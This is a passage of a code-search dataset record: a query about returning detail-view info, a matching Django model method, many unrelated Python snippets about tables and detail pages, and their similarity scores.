table_info({})\".format(\"week5\"))\r\n print(cur.fetchall())", "def create_table_description(self):\n table_description = [\"Name\"]\n label = 0\n for i in range(self.total_days_count):\n #The name is never shown. Assure that it is small to not\n #column resizing\n table_description.append(\n (str(i), \"number\"))\n table_description.append((\n str(i + self.total_days_count), \"number\"))\n return table_description", "def tables() -> dict[str, str]:\n return {\n \"land_use\": \"zone_id\",\n \"tours\": \"tour_id\",\n \"trips\": \"trip_id\",\n \"persons\": \"person_id\",\n \"households\": \"household_id\",\n }", "def set_up_tables(self):\n tables = []\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_info',\n 'description': desc.SimInfoRow,\n 'tabletitle': 'Simulation Information'})\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_timeseries',\n 'description': desc.SimTimeseriesRow,\n 'tabletitle': 'Simulation Power Data'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_params',\n 'description': desc.ThMetadataRow,\n 'tabletitle': 'TH Component Parameters'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_timeseries',\n 'description': desc.ThTimeseriesRow,\n 'tabletitle': 'TH Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_timeseries',\n 'description': desc.NeutronicsTimeseriesRow,\n 'tabletitle': 'Neutronics Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_params',\n 'description': desc.NeutronicsParamsRow,\n 'tabletitle': 'Neutronics Metadata'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'zetas',\n 'description': desc.ZetasTimestepRow,\n 'tabletitle': 'Neutron Precursor Concentrations'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'omegas',\n 'description': desc.OmegasTimestepRow,\n 'tabletitle': 'Decay Heat Fractions'})\n return tables", "def show_inventory(table):\r\n print('======= The Current Inventory: =======')\r\n print('ID\\tCD Title by: Artist\\n')\r\n for cd in table:\r\n print(cd)\r\n\r\n print('======================================')", "def get_summary_of_records(self):\n ids = self.get_saleman_ids()\n table = [\n [\"Seller name\",\"Number of sales\",\"Total Value ($)\"]\n ]\n for id in ids:\n table_id = [self.get_seller_name(id),self.get_number_of_sales(id),\n self.get_total_of_saleman(id)]\n table.append(table_id)\n data_table = AsciiTable(table)\n print(data_table.table)", "def show_research(self):\n self.list_research = orm_imp.read_research()\n print(\"========================================================\")\n for row in self.list_research:\n print(\n row[\"date\"], \"|| Produit :\", row['subcat'],\n \"|| Meilleure proposition :\", row['product'], \"| Score :\",\n row['nutriscore'], \"| Lien :\", row['url'],\n \"| Ingrédients :\", row['ingredient'])\n print(\"========================================================\")", "def description(self):\n # Sleep until we're done or we got the columns\n self._fetch_while(\n lambda: self._columns is None and\n self._state not in (self._STATE_NONE, self._STATE_FINISHED)\n )\n if self._columns is None:\n return None\n\n #TODO Configure for various storage plugins\n\n showRegexObj = re.match(r'SHOW', self._operation, re.I )\n if showRegexObj:\n result = [\n # name, type_code, display_size, internal_size, precision, scale, null_ok\n (col, 15, None, None, None, None, True)\n for col in self._columns\n ]\n else:\n types = self._get_column_types()\n result = [\n # name, type_code, display_size, internal_size, precision, scale, null_ok\n (col, self._get_type_code( types[col] ), None, None, None, None, True )\n for col in self._columns\n ]\n return result", "def getInfo():", "def test_010_info(self):\n HEADING()\n db = self.db\n\n db.connect()\n db.info()\n pass", "def info():\n print 'Loading info page'\n\n team_list = datastore.get_all_teams(engine)\n\n return render_template('info.html', rows=team_list)", "def __str__(self):\n\n table_list = [self.headers]\n\n for row in self.data:\n table_list.append([row[col] or \"\" for col in self.headers])\n\n return create_table_string(table_list)", "def table_name() -> str:\n pass", "def getTable(self):\n return self.table", "def _get_table(self):\n\t\treturn self._table", "def table(self):\r\n return self._table", "def __str__(self):\n dictt = self.getFullDict()\n return \"SymbolTable(\\n{}\\n)\".format(pprint.pformat(dictt))", "def make_new_tbl(self):\n debug = False\n default_dd = getdata.get_default_db_dets()\n con, cur = default_dd.con, default_dd.cur\n oth_name_types = getdata.get_oth_name_types(self.settings_data)\n tblname = self.tblname_lst[0]\n if debug: print(f'DBE in make_new_tbl is: {default_dd.dbe}')\n getdata.make_sofa_tbl(\n con, cur, tblname, oth_name_types, headless=False)\n wx.MessageBox(\n _('Your new table has been added to the default SOFA database'))", "def get_info(self):\n return \"TODO !\"", "def describe(self) -> str:", "def show_equipments(self): \n database = Database('data/database.db')\n equipments = database.read_equipments()\n view = Template(filename=\"view/template.html\", lookup=lookup)\n \n \n return view.render(\n rows = [[item.number, item.name, item.installation_number] for item in equipments],\n pageTitle = \"Équipements\",\n tableTitle = \"Liste de tous les équipements\",\n ths = [\"Numéro\", \"Nom\", \"Numéro d'installation\"]\n )", "def print_help(self):\r\n\r\n print (\"\"\"Show data values for assignment.\r\n\r\nUsage:\r\n cat <request or table path>\r\n cat --id <assignment_id> #Where assignment_id provided by 'vers <table path>' command\r\n\r\nFormatting flags:\r\n\r\n -c or --comments - Show comments on/off\r\n -nc or --no-comments\r\n\r\n -ph or --horizontal - Print table horizontally\r\n -pa or --vertical - Print table vertically\r\n (If no '--horizontal' or '--vertical' flag is given, the layout of table is determined automatically:\r\n vertical layout if table has only 1 row and more than 3 columns, horizontal otherwise)\r\n\r\n -b or --borders - Switch show borders on of off\r\n -nb or --no-borders\r\n\r\n -h or --header - Show header on/off\r\n -nh or --no-header\r\n\r\n -t or --time - Show time\r\n -nt or --no-time\r\n\r\nExamples:\r\n > cat /test/test_vars/test_table #print latest data for test_table\r\n > cat /test/test_vars/test_table::subtest #print latest data in subtest variation\r\n > cat /test/test_vars/test_table:::2012-08 #print data latest for august 2012\r\n\r\nSee also 'dump' command which is 'cat' formatted to save data to files. 'help dump'\r\n\r\n \"\"\")", "def t1_show(**kwargs):\n sessiontoken = kwargs['sessiontoken']\n proxy = kwargs['proxy']\n json_response = get_t1_json(proxy, sessiontoken)\n if json_response != False:\n t1_gateways = json_response['results']\n table = PrettyTable(['Name', 'id', 'Type'])\n for i in t1_gateways:\n if 'type' not in i:\n i['type'] = None\n table.add_row([i[\"display_name\"], i[\"id\"], i[\"type\"]])\n print(table)\n else:\n print(\"Something went wrong, please try again.\")\n sys.exit(1)", "def setup_table() -> Table:\n table = Table(\n show_header=True,\n caption=caption(),\n box=box.MINIMAL_HEAVY_HEAD,\n header_style='bold #ffff00',\n title='CRYPTO CANDLESTICKS',\n title_style='bold #54ff00 underline',\n show_lines=True,\n safe_box=True,\n expand=True,\n )\n\n table.add_column('OPEN', justify='center', no_wrap=True)\n table.add_column('CLOSE', justify='center', no_wrap=True)\n table.add_column('HIGH', justify='center', no_wrap=True)\n table.add_column('LOW', justify='center', no_wrap=True)\n table.add_column('VOLUME', justify='center', no_wrap=True)\n table.add_column('TICKER', justify='center', no_wrap=True)\n table.add_column('INTERVAL', justify='center', no_wrap=True)\n table.add_column('TIME', justify='center', no_wrap=True)\n\n return table", "def legendarios_sansanito():\n\tcur.execute(\"\"\"\n\t\t\t\tSELECT nombre\n\t\t\t\tFROM sansanito\n\t\t\t\tWHERE legendary = 1\n\t\t\t\t\"\"\")\n\tprint_table([hdrs_sansanito[2],hdrs_sansanito[-4]])", "def __get_general_subscr_info(self):\n query = (\"SELECT d.datname, r.rolname, s.subenabled, \"\n \"s.subconninfo, s.subslotname, s.subsynccommit, \"\n \"s.subpublications FROM pg_catalog.pg_subscription s \"\n \"JOIN pg_catalog.pg_database d \"\n \"ON s.subdbid = d.oid \"\n \"JOIN pg_catalog.pg_roles AS r \"\n \"ON s.subowner = r.oid \"\n \"WHERE s.subname = %(name)s AND d.datname = %(db)s\")\n\n result = exec_sql(self, query, query_params={'name': self.name, 'db': self.db}, add_to_executed=False)\n if result:\n return result[0]\n else:\n return False", "def load_info():\n\n infofile = os.path.join(ROOTDIR, 'weirdos.info')\n info = Table().read(infofile, format='ascii')\n\n return info", "def info() -> None:" ]
[ "0.6594911", "0.6500587", "0.64386666", "0.6242125", "0.61695975", "0.6073596", "0.6034584", "0.6016744", "0.5995429", "0.5982109", "0.59196234", "0.59027016", "0.5872902", "0.5864931", "0.5819785", "0.57872105", "0.57864594", "0.5785509", "0.57692075", "0.57690203", "0.5769016", "0.5755618", "0.5755457", "0.57506853", "0.57424843", "0.5735105", "0.57218677", "0.57147187", "0.57125026", "0.5671116", "0.5667065", "0.5658565", "0.5655856", "0.56346446", "0.5631911", "0.5604624", "0.5602374", "0.5602374", "0.56000483", "0.55884373", "0.5587949", "0.55709344", "0.55704844", "0.55689543", "0.55562943", "0.55536973", "0.5542364", "0.55409074", "0.5520364", "0.5498803", "0.549003", "0.5484697", "0.5471317", "0.5470154", "0.54678786", "0.5466641", "0.5466189", "0.5465589", "0.5452976", "0.54508084", "0.5448896", "0.54434335", "0.54354554", "0.5433669", "0.5429221", "0.5427723", "0.54254407", "0.5425401", "0.5415257", "0.5410847", "0.54044014", "0.5402905", "0.53672206", "0.5364117", "0.5358303", "0.5357674", "0.53528655", "0.53490794", "0.53484917", "0.53300107", "0.5319767", "0.53061706", "0.52984834", "0.52909595", "0.52825433", "0.52753127", "0.52713215", "0.52696407", "0.5266115", "0.5261455", "0.5258895", "0.5253989", "0.5251631", "0.5244559", "0.52429914", "0.52395797", "0.5238291", "0.5235015", "0.52341473", "0.5226157", "0.52255607" ]
0.0
-1
Return more detailed info for the detail view in VotoStudio's workshop.
def get_detail_info(self): detail_descriptors = getattr(self, 'detail_descriptors', None) if not detail_descriptors: raise AttributeError(f"Please add the 'detail_descriptors' field to the model '{self._meta.label}'") detail_values = [{ 'name': d, 'value': getattr(self, d), 'type': 'basic', } for d in detail_descriptors['basic']] related_descriptors = detail_descriptors['related'] for related_descriptor in related_descriptors: field_name = related_descriptor['field'] field = self._meta.get_field(field_name) field_value = getattr(self, field_name) # If this field on the instance # has a value then check its type. if field: field_type = field.get_internal_type() value = None if field_type == 'ManyToManyField': value = [[{ 'name': attr, 'value': getattr(o, attr) } for attr in ('id', *related_descriptor['attrs'])] for o in field_value.all()] if field_type == 'ForeignKey' or field_type == 'OneToOneField': value = [{ 'name': attr, 'value': getattr(field_value, attr, None), } for attr in related_descriptor['attrs']] detail_values.append({ 'name': field_name, 'model_label': field.related_model._meta.label, 'value': value, 'type': 'related', }) return detail_values
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_details(self):", "def print_details(self):\n self.view.print_details()", "def detail(self):\n info = self.info()\n return info", "def get_details(self):\n return self.details", "def get_details(self):\n return self.details", "def get_details(self):\n return self.details", "def details(request, product_id):\n product_details = get_object_or_404(Products, pk=product_id)\n nutriments = Nutriments_for_100g.objects.filter(product__id=product_id).order_by('name')\n context = {\n 'product_details': product_details,\n 'nutriments': nutriments\n }\n return render(request, 'store/details.html', context)", "def details_view(self):\n return_url = get_redirect_target() or self.get_url('.index_view')\n\n if not self.can_view_details:\n return redirect(return_url)\n\n id = get_mdict_item_or_list(request.args, 'id')\n if id is None:\n return redirect(return_url)\n\n model = self.get_one(id)\n\n if model is None:\n flash(gettext('Record does not exist.'), 'error')\n\n if self.details_modal and request.args.get('modal'):\n template = self.details_modal_template\n else:\n template = self.details_template\n\n relationship_views = []\n for relationship in self.model_relationship_views:\n relationship_view = self.model_relationship_views[relationship]\n bp = relationship_view.blueprint\n endpoint = '{}.ajax_config'.format(relationship_view.blueprint.name)\n data = {\n 'field': relationship,\n 'title': relationship_view.title,\n 'config_url': self.get_url(endpoint, model_id=id)\n }\n relationship_views.append(data)\n\n return self.render(\n template,\n model=model,\n details_columns=self._details_columns,\n get_value=self.get_detail_value,\n relationship_views=relationship_views,\n return_url=return_url\n )", "def on_detail(self, request, board_id):\n detailed_info = {\n 'creator': self.redis.get('creator:board:' + board_id).decode('utf-8'),\n 'text': self.redis.get('board:' + board_id).decode('utf-8'),\n 'time': self.redis.get('time:board:' + board_id).decode('utf-8'),\n 'board_id': board_id\n }\n return self.render_template('details.html', detailed_info=detailed_info, comments=self.get_comments(board_id))", "def detail(request, pk):\n mineral = get_object_or_404(Mineral, pk=pk)\n return render(request, 'detail.html', {'mineral': mineral})", "def GET_details(self, article):\r\n return DetailsPage(link = article).render()", "def product_details(request, pk):\n\n products = get_object_or_404(Product, pk=pk)\n product_creator = products.prod_creator_id\n return render(request, 'productdetails.html',\n {'products': products, 'pk': pk,\n 'product_creator': product_creator})", "def details(self):\n pass", "def detail_template(self):\n return '{}/{}.html'.format(self.object_name, self.detail_endpoint)", "def detail(request, target_id):\n temp_values = {\n \"subscroll\":True,\n }\n return render(request, 'server/detail.html', temp_values)", "def item_detail_view_service(self, item_info, connection):\n item_dao = ItemDao()\n item_detail_view = item_dao.item_detail_view_dao(item_info, connection)\n item_detail_view['images'] = item_dao.item_detail_image_dao(item_info, connection)\n item_detail_view['amenities'] = item_dao.item_detail_view_amenitie_dao(item_info,connection)\n item_detail_view['review'] = item_dao.item_detail_view_review_dao(item_info, connection)\n item_detail_view['review_avg'] = item_dao.detail_count_avg_review_dao(item_info, connection)\n\n return {'data' : item_detail_view}", "def detail_view(self, request, pk):\n instance = self.get_object()\n if self.revision_wanted is not None:\n instance = get_object_or_404(\n instance.revisions, id=self.revision_wanted).as_page_object()\n elif self.is_preview:\n instance = instance.get_latest_revision_as_page()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)", "def detail(): \n\n # get contentid\n content_id = request.args.get('contentid')\n\n # get shortest places\n title, places = get_shortest(content_id)\n print(content_id)\n\n return render_template('detail.html', \n title=title,\n content_id=content_id,\n places=places, \n count=len(places))", "def details(request):\n\treturn render(request, 'ExcelApp/main.html')", "def GetDetailsItem(self):\r\n if self.details: return self.details.GetDetailsItem()\r\n return None", "def get_details(self):\n print(self.name)\n print(10 * \"-\" + \"\\n\")\n print(self.description)\n for direction in self.linked_rooms:\n room = self.linked_rooms[direction]\n print(\"The \" + room.get_name() + \" is \" + direction)\n print(\"\\n\")", "def details(self) -> Optional[pulumi.Input['SolutionDetailsArgs']]:\n return pulumi.get(self, \"details\")", "def item_details(request, product_id):\n\n item = get_object_or_404(Product, pk=product_id)\n\n context = {\n 'product': item,\n }\n\n return render(request, 'products/item_details.html', context)", "def tool_details(request, tool_name, tool_version):\n context = {\n \"tool\": Tool.objects.order_by(\"-date_posted\").filter(\n title=tool_name, version=tool_version\n )[0]\n }\n return render(request, \"tools/tool_details.html\", context)", "def details(self):\n return self._details", "def print_details(self):\n print(\"[{}]\".format(self.name))\n print(\"ID: \" + str(self.id))\n print(\"name: %s\" % self.name)\n print(\"URL: %s\" % self.url)\n print(\"CPUs: \" + str(self.cpus) + \" cores\")\n print(\"Mem: \" + self.memory_str)\n print(\"Tasks: \" + str(self.tasks_len))\n print(\"Uptime %s\" + self.uptime)\n print(\"Uptime Descriptive %s\" + self.uptime_descriptive)\n print(\" \")", "def team_details(request, id):\n template = loader.get_template('team/details.html')\n\n try:\n team = Team.objects.get(pk=id)\n team_members = User.objects.filter(profile__team=team)\n\n context = {\n 'team_name': team.name,\n 'team_info': team.information,\n 'team_logo': team.logo,\n 'team_members': team_members,\n 'days': Information.getDaysToContest()\n }\n\n except Team.DoesNotExist:\n context = None\n\n return CustomHttpResponse.send(template, context, request)", "def action_show_subcontract_details(self):\n moves = self.move_orig_ids.production_id.move_raw_ids\n tree_view = self.env.ref('mrp_subcontracting.mrp_subcontracting_move_tree_view')\n form_view = self.env.ref('mrp_subcontracting.mrp_subcontracting_move_form_view')\n return {\n 'name': _('Raw Materials for %s') % (self.product_id.display_name),\n 'type': 'ir.actions.act_window',\n 'res_model': 'stock.move',\n 'views': [(tree_view.id, 'tree'), (form_view.id, 'form')],\n 'target': 'current',\n 'domain': [('id', 'in', moves.ids)],\n }", "def product_details(self) -> MqexsProductDetails:\n return self.__product_details", "def snippetDetail(requeset, pk, format = None):", "def detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/details.html', {'question': question})", "def getShowDetails(self):\n searchURL = \"http://api.tvmaze.com/shows/\" + str(self.__showID) \\\n + \"?embed=cast\"\n\n response = requests.get(searchURL)\n data = response.json()\n\n self.__detailsJSON = self.parseShowDetails(data)", "def product_details(self):\n return self._product_details", "def detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'problemfinder/details.html', {'question': question})", "def detailedInfo(cls):\n return 'tbd'", "def detailedInfo(cls):\n return 'tbd'", "def enable_details(self):\n self.cs.detail = True", "def detail(request, slug):\n\tarticle = get_object_or_404(Article, slug__exact=slug)\n\tcontext = {\n\t\t'article': article\n\t}\n\ttemplate = 'articles/detail.html'\n\treturn render(request, template, context)", "def printDetails(self):\n print str(self.number) + \": \" + self.title\n print \"URL: \" + self.URL\n print \"domain: \" + self.domain\n print \"score: \" + str(self.score) + \" points\"\n print \"submitted by: \" + self.submitter\n print \"# of comments: \" + str(self.commentCount)\n print \"'discuss' URL: \" + self.commentsURL\n print \"HN ID: \" + str(self.id)\n print \" \"", "def get_details(self, psvm):\n return self.get(psvm)", "def get_show_info(self, id, **kwargs):\n kwargs['id'] = id\n return self.get('info/show.json', **kwargs)", "def detail(request, reachcode):\n lake = get_object_or_404(Lake, reachcode=reachcode)\n photos = Photo.objects.filter(lake=lake)\n documents = Document.objects.filter(lake=lake)\n plants = lake.plants.all()\n return render(request, \"lakes/detail.html\", {\n \"lake\": lake,\n \"photos\": photos,\n \"documents\": documents,\n \"plants\": plants,\n })", "def tourdetails(request):\n\n context = {}\n\n return render(request, 'tourDetails.html', context=context)", "def doc_details(id):\n doctor = get_doctor_detail(id)\n\n location = doctor[\"location\"][\"city\"]\n print(f\"getting similar doctors in {location}\")\n category = doctor[\"categories\"][0][\"alias\"]\n category_name = doctor[\"categories\"][0][\"title\"]\n similar_doctors = get_doctors(\"doctors\", location=location, category=category)\n return render_template(\"about.html\",\n doctor=doctor, \n category=category, \n category_name=category_name, \n list_doctors_info=similar_doctors,\n location=location\n )", "def subscriber_detail(self):\n model_name = Subscriber._meta.object_name.lower()\n app_label = self._meta.app_label\n link = '/admin/%s/%s/' % (app_label, model_name)\n link += '?campaign__id=%d' % self.id\n display_link = _(\"<a href='%(link)s'>%(name)s</a>\") % \\\n {'link': link, 'name': _('details')}\n return display_link", "def view_details_complete():\n curItem = complete_tereeview.focus().strip('#')\n\n with open(\"images_url_dict.json\", \"r\") as images_dict_fo_complete:\n imgs_dict = json.load(images_dict_fo_complete)\n name = \"-\".join(curItem.lower().split())\n\n url, title, ID = imgs_dict[name]\n\n webbrowser.open_new_tab(\"https://eztv.io/shows/{}/{}/\".format(ID, title))", "def action_show_details(self):\n self.ensure_one()\n if self.is_subcontract:\n rounding = self.product_uom.rounding\n production = self.move_orig_ids.production_id\n if self._has_tracked_subcontract_components() and\\\n float_compare(production.qty_produced, production.product_uom_qty, precision_rounding=rounding) < 0 and\\\n float_compare(self.quantity_done, self.product_uom_qty, precision_rounding=rounding) < 0:\n return self._action_record_components()\n action = super(StockMove, self).action_show_details()\n if self.is_subcontract and self._has_tracked_subcontract_components():\n action['views'] = [(self.env.ref('stock.view_stock_move_operations').id, 'form')]\n action['context'].update({\n 'show_lots_m2o': self.has_tracking != 'none',\n 'show_lots_text': False,\n })\n return action", "def details(self):\n print \"ABC - Deployer.details()\"", "def detail(self):\n url = '/question/%d' % self.id\n d = req.get(url)\n return parser.detail(d)", "def details(self):\n raise NotImplementedError()", "def view_details_wishlist():\n try:\n curItem = wishlist_treeview.focus().strip('#')\n\n with open(\"images_url_dict.json\", \"r\") as images_dict_fo_complete:\n imgs_dict = json.load(images_dict_fo_complete)\n name = \"-\".join(curItem.lower().split())\n\n _, title, ID = imgs_dict[name]\n\n webbrowser.open_new_tab(\"https://eztv.io/shows/{}/{}/\".format(ID, title))\n except KeyError:\n print(\"Failed to use series list\")\n\n webbrowser.open_new_tab(\"https://www.imdb.com/find?ref_=nv_sr_fn&q={}&s=tt\".format(curItem))", "def detail(model_id: str = typer.Argument(..., help='Model ID')):\n with requests.get(f'{app_settings.api_v1_prefix}/model/{model_id}') as r:\n data = r.json()\n model_detailed_view(MLModel.parse_obj(data))", "def __showDetails(self):\n self.buttonBox.button(QDialogButtonBox.Close).setEnabled(False)\n self.buttonBox.button(QDialogButtonBox.Cancel).setEnabled(True)\n self.buttonBox.button(QDialogButtonBox.Cancel).setDefault(True)\n self.__showDetailsButton.setEnabled(False)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n QApplication.processEvents(QEventLoop.ExcludeUserInputEvents)\n \n self.__detailsData = {}\n \n itm = self.resultList.selectedItems()[0]\n packageVersions = itm.data(0, self.VersionRole)\n if len(packageVersions) == 1:\n packageVersion = packageVersions[0]\n elif len(packageVersions) == 0:\n packageVersion = \"\"\n else:\n packageVersion, ok = QInputDialog.getItem(\n self,\n self.tr(\"Show Package Details\"),\n self.tr(\"Select the package version:\"),\n packageVersions,\n 0, False)\n if not ok:\n return\n \n packageName = itm.text(0)\n self.__client.call(\n \"release_data\",\n (packageName, packageVersion),\n lambda d: self.__getPackageDownloadsData(packageVersion, d),\n self.__detailsError\n )", "def movie_info(self, **kwargs):\n\n path = self._get_movie_id_path('details')\n resp = self._get_method(path, kwargs)\n return resp", "def detail(request, location_id):\n location = get_object_or_404(Location, pk=location_id)\n\n return render(request, \"locations/detail.html\", context=fill_context({\"location\": location}))", "def get_item_detail(item_id):\n pass", "def show_recipe_details(id):\n if not g.user:\n flash(\"Please login to view.\",\"warning\")\n return redirect('/login')\n\n \n recipe = get_recipe(id)\n print(recipe['instructions'])\n \n return render_template(\"recipes/detail.html\", recipe=recipe)", "def detail(self, req):\n return self.index(req)", "def details(self, identifier):\n return self.client.request_with_method(Methods.GET % (self.name, identifier,))['item']", "def get_shop_info(request, slug):\n try:\n shop_info = Shop.objects.get(slug=slug)\n data_obj = {\n \"shop_name\": shop_info.title,\n \"logo\": shop_info.logo.url if shop_info.logo else \"\",\n \"tags\": shop_info.categories if shop_info.categories else [],\n \"slug\": shop_info.slug,\n \"id\": shop_info.id\n }\n return Response(data={\"shop_info\": data_obj}, status=status.HTTP_200_OK)\n\n except shop_info.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)", "def portfolio_detail():\n return render_template('portfolio/portfolio.html')", "def details(self, identifier):\n return self.client.request_with_method(Methods.GET % (self.name, identifier,))", "def detail_view(request):\n id_ = request.GET['id']\n detail = BikeDetails.objects.get(id=id_)\n data = {'reg_no': detail.bike_reg_no, 'model': detail.bike_model, 'km_driven': detail.km_driven, 'top_speed': detail.top_speed, 'milege': detail.milege, 'fuel_capacity': detail.fuel_tank_capacity, 'max_power': detail.max_power,'image': detail.image}\n return render(request, 'bike_detail.html', data)", "def quick_info_retrieve_view(request):\n kind_of_ballot_item = request.GET.get('kind_of_ballot_item', \"\")\n ballot_item_we_vote_id = request.GET.get('ballot_item_we_vote_id', \"\")\n return quick_info_retrieve_for_api(kind_of_ballot_item=kind_of_ballot_item,\n ballot_item_we_vote_id=ballot_item_we_vote_id)", "def _get_details(self, details):\n details['DoT'] = \"Yes\" if self.static else \"No\"\n details['device'] = self.device\n details['volume_id'] = self.volume_id\n details['from_snap'] = \"No\" if not self.from_snapshot_id else self.from_snapshot_id\n details['from_archive'] = \"No\" if not self.from_archive else self.from_archive['url']\n details['snapshot_progress'] = self.snapshot_progress\n details['snapshot_status'] = self.snapshot_status\n # TODO: keep track of any errors\n details['err_msg'] = None if details.get('err_msg', '') == '' else details['err_msg']\n details['snapshots_created'] = self.snapshots_created\n return details", "def as_detail_html(instance, title=None):\n node = ModelDetailNode(instance)\n return node.render(Context({'title':title}))", "def get_product_details(self):\n\n db.execute(\"SELECT * FROM Product WHERE id = %s\", (self.id,))\n product = db.fetch()\n\n self.name = product[1]\n self.brand = product[2]\n self.nutriscore_id = product[3]\n self.store = product[4]\n self.description = product[5]\n self.url = product[6]", "def case_detail_view(request, pk):\n issue = _get_issue(request, pk)\n tenancy = _get_tenancy(issue)\n notes = _get_issue_notes(request, pk)\n context = {\n \"issue\": IssueDetailSerializer(issue).data,\n \"tenancy\": TenancySerializer(tenancy).data,\n \"notes\": IssueNoteSerializer(notes, many=True).data,\n \"details\": _get_submitted_details(issue),\n \"actionstep_url\": _get_actionstep_url(issue),\n \"urls\": get_detail_urls(issue),\n \"permissions\": {\n \"is_paralegal_or_better\": request.user.is_paralegal_or_better,\n \"is_coordinator_or_better\": request.user.is_coordinator_or_better,\n },\n }\n return render_react_page(request, f\"Case {issue.fileref}\", \"case-detail\", context)", "def plante_info(id):\n plante = get_plante(id)\n return render_template(\n \"plante-info.html\",\n plante = plante,\n title = plante.get_name(),\n parterre = get_parterre(plante.get_parterre()))", "def student_view_data(self, context=None):\n return {\n 'title': self.title,\n 'description': self.description,\n 'embed_code': self.embed_code,\n 'highres_url': self.highres_url,\n 'lowres_url': self.lowres_url,\n }", "def details_window(self, instance: Union[Nobleman, Location]):\n window = tk.Toplevel()\n window.title(instance.name)\n window.protocol(\"WM_DELETE_WINDOW\",\n partial(self.close_details_window, instance))\n self.register_extra_window(instance, window)\n self.generate_window_content(instance, window)", "def get_show_information():\n\n #getting the guidebox_id variable from show_page.html\n guidebox_id = request.args.get(\"guidebox_id\")\n\n #get the show from the database\n show = Show.find_show_with_guidebox_id(guidebox_id)\n\n #check if show has a description, if it does then just pass the show on\n if show.description and show.network:\n print \"\\n\\n\\nShow description and network in database.\\n\\n\\n\"\n #if not, call API to get the show description, add description to show information in the database\n\n else:\n #API call to get the show information\n show_data = guidebox_show_info(guidebox_id)\n \n #add show description to table\n Show.add_description_network_to_show(show, show_data)\n print \"\\n\\n\\nAdded show description and network to the database.\\n\\n\\n\"\n \n\n show_info = Show.find_show_with_guidebox_id(guidebox_id)\n\n return jsonify(show_info.as_dict())", "def mineral_detail(request, pk):\n selected_mineral = get_object_or_404(Mineral, id=pk)\n return render(request,\n 'detail.html',\n {'mineral': selected_mineral})", "def movie_details(movie_id):\n\n movie = crud.get_movie_by_id(movie_id)\n\n return render_template('movie_details.html', movie=movie)", "def getDetailsJSON(self):\n return self.__detailsJSON", "def get_details(self):\n # The basic details are put sussed out by our super class\n # method and put in 'self.xml_details'\n #\n super(Movie, self).get_details()\n\n # And now we get the rest of the details\n #\n self.year = ''\n self.certifications = []\n self.runtime = None\n self.rating = None\n self.votes = None\n self.genres = []\n self.directors = []\n self.writers = []\n self.studio = ''\n self.outline = ''\n self.plot = ''\n self.fanart = [] # List of URLs of fanart images.\n self.posters = [] # List of URLs of poster images.\n self.trailers = [] # List of URLs of trailers.\n\n # This is the list ScrapeURL's that represent custom functions\n # of further data to lookup. These, in turn, when parsed, may\n # in turn yield more custom functions to lookup more data.\n #\n self.urls = []\n \n # Further lookups for this item may only give us partial URL's\n # We take the first lookup detail link's url and use that as a\n # base url for further lookups.\n #\n self.base_url = self.links[0].url\n\n # And here we parse the information that was in the XML response the\n # parser gave us.\n #\n dom = parseString(self.xml_details)\n ep = dom.firstChild\n\n self.id = get_child_data(ep, \"id\", self.id)\n self.title = get_child_data(ep, \"title\", self.title)\n self.year = try_int(get_child_data(ep, \"year\"))\n\n certification = first_child(ep, \"certification\")\n while certification:\n self.certifications.append(certification.firstChild.data)\n certification = next_sibling(certification, \"certification\")\n\n self.runtime = get_child_data(ep, \"runtime\")\n self.rating = try_float(get_child_data(ep, \"rating\"))\n self.votes = try_int(get_child_data(ep, \"votes\"))\n\n genre = first_child(ep, \"genre\")\n while genre:\n self.genres.append(genre.firstChild.data)\n genre = next_sibling(genre, \"genre\")\n\n self.studio = get_child_data(ep, \"studio\", \"\")\n self.outline = get_child_data(ep, \"outline\", \"\")\n self.plot = get_child_data(ep, \"plot\", \"\")\n\n # Now we are done with the 'simple' stuff out of the XML response\n # we got from the parser. Next we loop through any \"custom function\"\n # URL's. These are recursive, and may also invoke back functions\n # on this movie object to fill in even more specific nested information.\n #\n url = first_child(ep, \"url\")\n while url:\n self.urls.append(ScrapeURL(url, cache = self.scraper.cache,\n base_url = self.base_url))\n url = next_sibling(url, \"url\")\n\n # At this point we are finished parsing with this dom. minidom says we\n # should still unlink it to be sure for it to be able to be GC'd. Ug.\n #\n ep = None\n dom.unlink()\n dom = None\n\n # XXX I am not sure there is any reason to store these URL's.\n # in the above loop perhaps we should just directly invoke\n # the parser on every URL as we come across it.\n #\n for url in self.urls:\n self.scraper.custom_function(url, self)\n \n return", "def ProfService_detail(request, pk):\n ProfService = get_object_or_404(PServices, pk=pk)\n \n return render(request, \"ProfService_detail.html\", {\"ProfService\": ProfService})", "def detailed(self, todo):\n rv = self.compact_multiple([todo])\n if todo.description:\n rv = \"{}\\n\\nDescription: {}\".format(rv, todo.description)\n if todo.location:\n rv = \"{}\\n\\nLocation: {}\".format(rv, todo.location)\n return rv", "def show_catalogue(self):\n\n data = cur.execute(\"\"\"SELECT productid, productname, unitcost, stock, location \n FROM catalogue WHERE vendorname = ?\"\"\", (self.vendorname,)).fetchall()\n print(tabulate(data, headers=[\"Product ID\", \"Name\", \"Unit Cost\", \"Stock\", \"Location\"]))", "def get_details(self):\n # The basic details are put sussed out by our super class\n # method and put in 'self.xml_details'\n #\n super(Series, self).get_details()\n # And now we get the rest of the details\n #\n self.premiered = None\n self.rating = None\n self.plot = ''\n self.genres = []\n self.thumbs = []\n self.fanart = []\n self.episode_guide_urls = []\n self.episodes = None\n\n # Further lookups for this item may only give us partial URL's\n # We take the first lookup detail link's url and use that as a\n # base url for further lookups.\n #\n self.base_url = self.links[0].url\n\n dom = parseString(self.xml_details)\n ep = dom.firstChild\n\n self.title = get_child_data(ep, \"title\", self.title)\n self.plot = get_child_data(ep, \"plot\", \"\")\n self.premiered = get_child_data(ep, \"premiered\")\n self.rating = try_float(get_child_data(ep, \"rating\"))\n\n genre = first_child(ep, 